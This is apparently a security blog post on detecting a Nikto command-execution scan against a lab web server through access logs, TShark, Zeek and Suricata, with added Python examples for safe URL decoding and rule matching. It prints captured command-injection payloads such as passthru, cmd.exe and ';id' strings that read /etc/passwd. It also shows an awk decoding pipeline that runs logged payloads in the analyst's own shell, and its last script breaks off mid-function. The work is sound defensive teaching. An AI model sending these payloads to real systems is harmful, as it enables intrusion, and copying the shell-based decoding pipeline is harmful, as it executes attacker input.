Remote Shell <p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection.</a> </p><p>From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and/or processes used for the network forensics are log analysis, TShark, Zeek and Suricata.</p><p><span style="font-size: medium;"><b>The Hack - Beginning Nikto - Command Execution / Remote Shell </b></span></p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 8 </span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Start Time: 2023-06-07 15:54:20 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</span>
<span style="color: white;">+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/</span>
<span style="color: white;">+ /: Retrieved x-powered-by header: PHP/8.0.28.</span>
<span style="color: white;">+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.</span>
<span style="color: white;">+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.</span>
<span style="color: white;">+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing</span>
<span style="color: white;">+ /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.</span>
<span style="color: white;">+ ...</span>
<span style="color: white;">+ /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.</span>
<span style="color: white;">+ /?-s - Redirects (302) to http://10.0.0.106/dashboard/ , PHP allows retrieval of the source code via the -s parameter, and may allow command execution.</span>
<span style="color: white;">+ 1074 requests: 0 error(s) and 6 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-06-07 15:54:22 (GMT-4) (2 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the above, one may immediately conclude that this site is vulnerable. However, we know from our previous posts that the parameters referenced by <i>"index.php"</i>, such as name, do not exist on this page.</div><div><br /></div><div>See here for more on attacking Command Injection: <i><br /></i><a href="https://www.securitynik.com/2017/02/beginning-web-application-testing-os.html">Learning by practicing: Beginning Web Application Testing: OS Command Injection - DVWA (securitynik.com)</a></div></div><div><br /></div><div><span style="font-size: medium;"><b>Detect - Log Analysis</b></span></div><div><br /></div><div><div>Jumping straight to the decoding of the URLs. Take a look at the first 7 lines with parameters that need decoding.</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | head --lines=7</span>
<span style="color: white;">%0acat%0a/etc/passwd%0a </span>
<span style="color: white;">aaaaaaaa </span>
<span style="color: white;">action=load&whois=%3Bid </span>
<span style="color: white;">action=modify_user </span>
<span style="color: white;">APP=qmh-news&TEMPLATE=;ls%20/etc| </span>
<span style="color: white;">arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D </span>
<span style="color: white;">calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 </span>
</pre></div>
</div><div><br /></div><div>Decoding above and others via urldecode.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }'</span>
<span style="color: white;">...</span>
<span style="color: white;">aaaaaaaa</span>
<span style="color: white;">action=load</span>
<span style="color: white;">action=modify_user</span>
<span style="color: white;">alert-debug.log</span>
<span style="color: white;">arguments=O:12:"vB_dB_Result":2:{s:5:"</span>
<span style="color: white;">/bin/cat /etc/passwd</span>
<span style="color: white;">cat</span>
<span style="color: white;">cat /etc/hosts</span>
<span style="color: white;">cat /etc/passwd</span>
<span style="color: white;">cat /etc/passwd </span>
<span style="color: white;">/c dir</span>
<span style="color: white;">/c dir c:\</span>
<span style="color: white;">/c dir c:\"</span>
<span style="color: white;">/c dir /OG</span>
<span style="color: white;">cli=aa aa'cat /etc/hosts</span>
<span style="color: white;">cmd=cat /etc/passwd</span>
<span style="color: white;">cmd=dir c:\\</span>
<span style="color: white;">command=savesetup</span>
<span style="color: white;">conn.log</span>
<span style="color: white;">/c ver</span>
<span style="color: white;">data=Download</span>
<span style="color: white;">dns.log</span>
<span style="color: white;">email=x</span>
<span style="color: white;">/etc/passwd</span>
<span style="color: white;">_MAILTO=xx</span>
<span style="color: white;">message=test\</span>
<span style="color: white;">name=forums</span>
<span style="color: white;">name=Forums</span>
<span style="color: white;">name=Network_Tools</span>
<span style="color: white;">name=PNphpBB2</span>
<span style="color: white;">Nikto=forums</span>
<span style="color: white;">Nikto=Forums</span>
<span style="color: white;">pass= </span>
<span style="color: white;">process</span>
<span style="color: white;">QALIAS=x</span>
<span style="color: white;">Qname=root</span>
<span style="color: white;">QNikto=root</span>
<span style="color: white;">query=AAA</span>
<span style="color: white;">realname=aaa</span>
<span style="color: white;">realNikto=aaa</span>
<span style="color: white;">reporter.log</span>
<span style="color: white;">-s</span>
<span style="color: white;">sd=ls /etc</span>
<span style="color: white;">server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF</span>
<span style="color: white;">type=Library</span>
<span style="color: white;">-v</span>
<span style="color: white;">WSDL</span>
<span style="color: white;">xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&</span>
</pre></div>
</div><div><br /><div>We already know most of those parameters are non-existent. Additionally, the host running this webserver is Windows based, not Linux. </div><div><br /></div><div>See here for more on detecting command injection via logs.<br /><a href="https://www.securitynik.com/2017/02/beginning-web-application-testing_5.html">Learning by practicing: Beginning Web Application Testing: Detecting OS Command Injection - DVWA (securitynik.com)</a></div><div><br /></div><br /><b><span style="font-size: medium;">Detect - Packet Analysis</span></b></div><div><br />Setup for packet analysis. Capture packets on ports 80 and 443.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$tshark -n -w tuning_1.pcap -f 'tcp port(80 or 443)' --interface eth0</span>
</pre></div>
<br />Decoding the URLs from the packet data.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ tshark -n -r tuning_8.pcap -Y 'http.request.method == "GET"' -T fields -e http.request.uri | grep --perl-regexp '\?.*' --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator='HTTP' '{ print $1 }' | sort --unique | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator=' ' '{ system("urlencode -d "$1) }'</span>
<span style="color: white;">cat</span>
<span style="color: white;">/etc/passwd</span>
<span style="color: white;">aaaaaaaa</span>
<span style="color: white;">action=load</span>
<span style="color: white;">action=modify_user</span>
<span style="color: white;">cat /etc/passwd</span>
<span style="color: white;">cat /etc/hosts</span>
<span style="color: white;">/c dir</span>
<span style="color: white;">/c dir c:"</span>
<span style="color: white;">/c dir c:\</span>
<span style="color: white;">/c dir /OG </span>
<span style="color: white;">cli=aa aa'cat /etc/hosts </span>
<span style="color: white;">cmd=cat /etc/passwd </span>
<span style="color: white;">cmd=dir c:\ </span>
<span style="color: white;">command=savesetup </span>
<span style="color: white;">/c ver </span>
<span style="color: white;">data=Download </span>
<span style="color: white;">...</span>
<span style="color: white;">name=forums</span>
<span style="color: white;">name=Forums</span>
<span style="color: white;">name=forums</span>
<span style="color: white;">name=Network_Tools</span>
<span style="color: white;">name=Forums</span>
<span style="color: white;">name=PNphpBB2</span>
<span style="color: white;">name=PNphpBB2</span>
<span style="color: white;">Nikto=forums</span>
<span style="color: white;">Nikto=Forums</span>
<span style="color: white;">Nikto=forums</span>
<span style="color: white;">Nikto=Forums</span>
<span style="color: white;">pass= </span>
<span style="color: white;">QALIAS=x</span>
<span style="color: white;">/bin/cat /etc/passwd</span>
<span style="color: white;">Qname=root</span>
<span style="color: white;">cat /etc/passwd </span>
<span style="color: white;">QNikto=root</span>
<span style="color: white;">cat /etc/passwd </span>
<span style="color: white;">query=AAA</span>
<span style="color: white;">realNikto=aaa</span>
<span style="color: white;">-s</span>
<span style="color: white;">sd=ls /etc</span>
<span style="color: white;">realname=aaa</span>
<span style="color: white;">server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF</span>
<span style="color: white;">t=2</span>
<span style="color: white;">t=2</span>
<span style="color: white;">type=Library</span>
<span style="color: white;">type=Library</span>
<span style="color: white;">WSDL</span>
<span style="color: white;">xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&</span>
</pre></div>
<br /><div>Not much more to do here. Transitioning to Zeek.</div><div><br /></div></div><div><span style="font-size: medium;"><b>Detect - Zeek Analysis</b></span><br /><br />Setup Zeek.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
<div><br /></div>Analyzing the<i> http.log</i> file.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ cat http.log | grep --perl-regexp "\s+\/.*?\s+" --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp '\?.*' --only-matching | grep --invert-match "phpinfo" | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }'</span>
<span style="color: white;">aaaaaaaa</span>
<span style="color: white;">uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),121(bluetooth),133(scanner),141(vboxsf),142(kaboxer),147(docker)</span>
<span style="color: white;">action=load</span>
<span style="color: white;">action=modify_user</span>
<span style="color: white;">...</span>
<span style="color: white;">sd=ls</span>
<span style="color: white;">server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF</span>
<span style="color: white;">sh: 1: Syntax error: "(" unexpected</span>
<span style="color: white;">t=2</span>
<span style="color: white;">type=Library</span>
<span style="color: white;">type=Library</span>
<span style="color: white;">user=cpanel</span>
<span style="color: white;">user_id=1</span>
<span style="color: white;">-v</span>
<span style="color: white;">WSDL</span>
<span style="color: white;">x0acatx0a/etc/passwdx0a</span>
</pre></div>
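<div>A note on the three decoding pipelines above (log, packet and Zeek sections). Each one ends in awk's <i>system("urlencode -d "$1)</i>, which hands the still-encoded query string to /bin/sh. Characters such as <i>;</i>, <i>&amp;</i>, backticks and parentheses in the scanner's payloads are therefore interpreted by the analyst's own shell: the <i>uid=1000(kali) ...</i> line and the <i>sh: 1: Syntax error: "(" unexpected</i> line in the Zeek output are that shell reacting to log content, not decoded URLs, and the <i>&amp;</i>-split lines such as <i>action=load</i> lose the rest of their parameters. The script below is an added example (not the post's code) that does the same extraction and decoding in-process with <i>urllib.parse</i>, decodes repeatedly so the double-encoded <i>%2527</i> seen in the Nikto requests becomes a quote, and tags each decoded string with simple indicators. The sample log lines are constructed in Apache combined format from the requests shown in the post; the client IP, timestamps, sizes and the path on the <i>%0a</i> line are made up.</div>

```python
"""
Safe query-string extraction and decoding for Apache access-log lines.

Added example, not the blog's own pipeline. Decoding happens in-process with
urllib.parse instead of through a shell, because the values are attacker-controlled.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample in Apache combined-log format. The query strings are
# modelled on the Nikto requests shown in the post; client IP, timestamps,
# sizes and the path on the %0a line are made up for the example.
SAMPLE_ACCESS_LOG = """\
10.0.0.50 - - [07/Jun/2023:15:54:20 -0400] "GET /cgi-bin/cmd.exe?/c+dir HTTP/1.1" 302 215 "-" "Mozilla/5.0"
10.0.0.50 - - [07/Jun/2023:15:54:20 -0400] "GET /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1" 302 215 "-" "Mozilla/5.0"
10.0.0.50 - - [07/Jun/2023:15:54:21 -0400] "GET /cal.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 HTTP/1.1" 302 215 "-" "Mozilla/5.0"
10.0.0.50 - - [07/Jun/2023:15:54:21 -0400] "GET /cgi-bin/test.cgi?%0acat%0a/etc/passwd%0a HTTP/1.1" 302 215 "-" "Mozilla/5.0"
10.0.0.50 - - [07/Jun/2023:15:54:21 -0400] "GET /dashboard/ HTTP/1.1" 200 7576 "-" "Mozilla/5.0"
10.0.0.50 - - [07/Jun/2023:15:54:21 -0400] "GET /phpinfo.php?x=1 HTTP/1.1" 302 215 "-" "Mozilla/5.0"
"""

# Request line inside the quoted part of a combined-log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators worth a second look once the query string is decoded.
SHELL_METACHARS = re.compile(r"[;|`$\n]|&&|\$\(")
COMMAND_WORDS = re.compile(r"\b(cat|ls|dir|echo|uname|passthru|system|cmd\.exe)\b", re.IGNORECASE)
SENSITIVE_FILES = re.compile(r"/etc/passwd|/etc/hosts|win\.ini", re.IGNORECASE)


def query_strings(log_text):
    """Yield (path, raw_query) for every request line that carries a query string."""
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group("target"):
            continue
        path, _, qs = m.group("target").partition("?")
        yield path, qs


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing.

    Nikto's %2527 is a double-encoded single quote: one pass leaves %27 behind,
    the second pass turns it into '. Three rounds is plenty for real traffic.
    """
    for _ in range(max_rounds):
        decoded = unquote_plus(value)   # also turns '+' into a space, like urlencode -d
        if decoded == value:
            break
        value = decoded
    return value


def classify(decoded):
    """Name the indicator classes present in a decoded query string."""
    found = []
    if SHELL_METACHARS.search(decoded):
        found.append("shell-metachar")
    if COMMAND_WORDS.search(decoded):
        found.append("command-keyword")
    if SENSITIVE_FILES.search(decoded):
        found.append("sensitive-file")
    return found


def analyze(log_text, skip=("phpinfo",)):
    """Decode every query string and tag it, mirroring the post's
    grep/cut/urlencode pipeline but without ever invoking a shell."""
    results = []
    for path, qs in query_strings(log_text):
        if any(s in path for s in skip):   # the post drops phpinfo requests too
            continue
        decoded = decode_fully(qs)
        results.append({"path": path, "raw": qs, "decoded": decoded,
                        "indicators": classify(decoded)})
    return results


if __name__ == "__main__":
    for r in analyze(SAMPLE_ACCESS_LOG):
        print(f"{r['path']}  {r['indicators']}\n    {r['decoded']!r}")
```

Run it as a script to see each decoded query string with its tags; the indicator lists are deliberately coarse (a word like <i>dir</i> or <i>echo</i> will also appear in legitimate parameters), so they are a triage aid, not a verdict.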
</div><div><br /></div><div><div>The above information is the same as that seen in the log and packet analysis sections; the difference is that it was extracted from Zeek's <i>http.log</i> file.</div></div><div><br /></div><div><div><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></div><div><br />Setup Suricata to operate in IDS mode.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all</span>
</pre></div>
<br />Wrapping this up with Suricata.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5 </span>
<span style="color: white;"> 45 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 23 1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt </span>
<span style="color: white;"> 22 1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt </span>
<span style="color: white;"> 14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315 </span>
<span style="color: white;"> 12 1:2100982:12] GPL EXPLOIT unicode directory traversal attempt </span>
</pre></div>
</div><div><br /></div><div><div>The one we will extract here is the one with 23 hits: "<i>1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt </i>"</div><div><br /></div><div>What is the rule looking for?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ grep "2009361" /var/lib/suricata/rules/suricata.rules | fmt</span>
<span style="color: white;">alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET</span>
<span style="color: white;">WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt";</span>
<span><span style="color: white;">flow:to_server,established; http.uri; </span><b><span style="color: #fcff01;">content:"/cmd.exe"</span></b><span style="color: white;">; nocase;</span></span>
<span style="color: white;">reference:url,doc.emergingthreats.net/2009361; classtype:attempted-recon;</span>
<span style="color: white;">sid:2009361; rev:8; metadata:created_at 2010_07_30, updated_at</span>
<span style="color: white;">2020_09_14;)</span>
</pre></div>
</div><div><br /></div><div>The rule is looking to ensure the 3-way handshake is completed and that the traffic is going to the server. The server in this case is the device that sent the <i>SYN-ACK</i> as part of establishing the session during the three-way handshake. It is also looking for the content "<i>/cmd.exe</i>" in the URI, case-insensitively. Let's find that packet, where "/cmd.exe" is in the <i>URI</i>. </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">ALERT CNT: 1</span>
<span style="color: white;">ALERT MSG [00]: ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt</span>
<span style="color: white;">ALERT GID [00]: 1</span>
<span style="color: white;">ALERT SID [00]: 2009361</span>
<span style="color: white;">ALERT REV [00]: 8</span>
<span style="color: white;">ALERT CLASS [00]: Attempted Information Leak</span>
<span style="color: white;">ALERT PRIO [00]: 2</span>
<span style="color: white;">ALERT FOUND IN [00]: STATE</span>
<span style="color: white;">ALERT IN TX [00]: 49</span>
<span style="color: white;">PAYLOAD LEN: 211</span>
<span style="color: white;">PAYLOAD:</span>
<span style="color: white;"> 0000 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F </span><span style="color: #fcff01;"><b>63 6D 64</b></span><span><span style="color: white;"> GET /cgi -bin/</span><b><span style="color: #fcff01;">cmd</span></b></span>
<span><span style="color: white;"> 0010 </span><b><span style="color: #fcff01;">2E 65 78 65</span></b><span style="color: white;"> 3F 2F 63 2B 64 69 72 20 48 54 54 50 </span><b><span style="color: #fcff01;">.exe</span></b><span style="color: white;">?/c+ dir HTTP</span></span>
<span style="color: white;"> 0020 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 30 2E 30 /1.1..Ho st: 10.0</span>
<span style="color: white;"> 0030 2E 30 2E 31 30 36 0D 0A 43 6F 6E 6E 65 63 74 69 .0.106.. Connecti</span>
<span style="color: white;"> 0040 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A on: Keep -Alive..</span>
<span style="color: white;"> 0050 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Age nt: Mozi</span>
<span style="color: white;"> 0060 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 lla/5.0 (Windows</span>
<span style="color: white;"> 0070 20 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B NT 10.0 ; Win64;</span>
<span style="color: white;"> 0080 20 78 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 x64) Ap pleWebKi</span>
<span style="color: white;"> 0090 74 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C t/537.36 (KHTML,</span>
<span style="color: white;"> 00A0 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 like Ge cko) Chr</span>
<span style="color: white;"> 00B0 6F 6D 65 2F 37 34 2E 30 2E 33 37 32 39 2E 31 36 ome/74.0 .3729.16</span>
<span style="color: white;"> 00C0 39 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 9 Safari /537.36.</span>
<span style="color: white;"> 00D0 0A 0D 0A </span>
</pre></div>
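<div>To make the <i>content</i> / <i>nocase</i> / <i>distance:0</i> keywords concrete, here is an added example (not Suricata's code and not the post's) that parses the three rules quoted on this page (2009361 above, and 2006445 / 2006446 from the end of the previous post, trimmed of their reference and metadata options) and applies the same matching logic to the URIs from the two alert payloads shown. It assumes the raw request-line URI stands in for Suricata's normalized <i>http.uri</i> buffer and models only <i>msg</i>, <i>sid</i>, <i>content</i>, <i>nocase</i> and <i>distance</i> (no <i>|hex|</i> escapes, no <i>pcre</i>). The fourth request is constructed to show why <i>distance:0</i> matters: it contains both SELECT and FROM, but FROM before SELECT, so 2006445 does not fire.</div>

```python
"""
Simplified emulation of Suricata `content` matching with `nocase` and the
relative `distance` modifier, applied to the URI of raw HTTP requests.

Added example, not Suricata's code. It ignores every keyword except msg, sid,
content, nocase and distance, matches the raw request-line URI rather than the
libhtp-normalized http.uri buffer, and does not model |hex| escapes or pcre.
"""

# Rule text from the posts, trimmed to the keywords this matcher models.
RULES = [
    'alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM"; '
    'flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; '
    'classtype:web-application-attack; sid:2006445; rev:14;)',
    'alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT"; '
    'flow:established,to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; '
    'classtype:web-application-attack; sid:2006446; rev:14;)',
    'alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt"; '
    'flow:to_server,established; http.uri; content:"/cmd.exe"; nocase; classtype:attempted-recon; sid:2009361; rev:8;)',
]

# Request lines taken from the alert-debug.log payloads shown in the posts;
# the trailing headers are shortened.
SQLI_REQUEST = ("GET /site/'%20UNION%20ALL%20SELECT%20FileToClob('/etc/passwd','server')::html,0"
                "%20FROM%20sysusers%20WHERE%20username=USER%20--/.html HTTP/1.1\r\n"
                "Host: 10.0.0.106\r\n\r\n")
CMD_REQUEST = "GET /cgi-bin/cmd.exe?/c+dir HTTP/1.1\r\nHost: 10.0.0.106\r\n\r\n"
# Constructed: same keywords as 2006445 but in the wrong order, so distance:0 fails.
REORDERED_REQUEST = "GET /search?from=home&select=1 HTTP/1.1\r\nHost: 10.0.0.106\r\n\r\n"
BENIGN_REQUEST = "GET /dashboard/ HTTP/1.1\r\nHost: 10.0.0.106\r\n\r\n"


def parse_rule(rule_text):
    """Return {"sid", "msg", "contents"}; contents is the ordered list of matchers.

    Options are split on ';', which is adequate for the rules above because
    none of their msg strings contain a semicolon.
    """
    options = rule_text[rule_text.index("(") + 1:rule_text.rindex(")")]
    rule = {"sid": None, "msg": None, "contents": []}
    for option in (o.strip() for o in options.split(";")):
        key, _, value = option.partition(":")
        value = value.strip()
        if key == "msg":
            rule["msg"] = value.strip('"')
        elif key == "sid":
            rule["sid"] = int(value)
        elif key == "content":
            rule["contents"].append({"pattern": value.strip('"'), "nocase": False, "distance": None})
        elif key == "nocase" and rule["contents"]:
            rule["contents"][-1]["nocase"] = True
        elif key == "distance" and rule["contents"]:
            # distance makes this content relative to the end of the previous match
            rule["contents"][-1]["distance"] = int(value)
    return rule


def rule_matches(rule, uri):
    """Apply the content matchers in order, honouring nocase and distance."""
    end_of_previous = 0
    for c in rule["contents"]:
        haystack, needle = uri, c["pattern"]
        if c["nocase"]:
            haystack, needle = haystack.lower(), needle.lower()
        # A relative content may only match at or after the previous match's end.
        start = end_of_previous + c["distance"] if c["distance"] is not None else 0
        idx = haystack.find(needle, start)
        if idx < 0:
            return False
        end_of_previous = idx + len(needle)
    return True


def request_uri(raw_request):
    """Pull the request-target out of the first line of a raw HTTP request."""
    request_line = raw_request.split("\r\n", 1)[0]
    return request_line.split(" ")[1]


def alerts_for(raw_request, rule_texts=RULES):
    """Return the sids of every rule whose content matchers hit the request URI."""
    uri = request_uri(raw_request)
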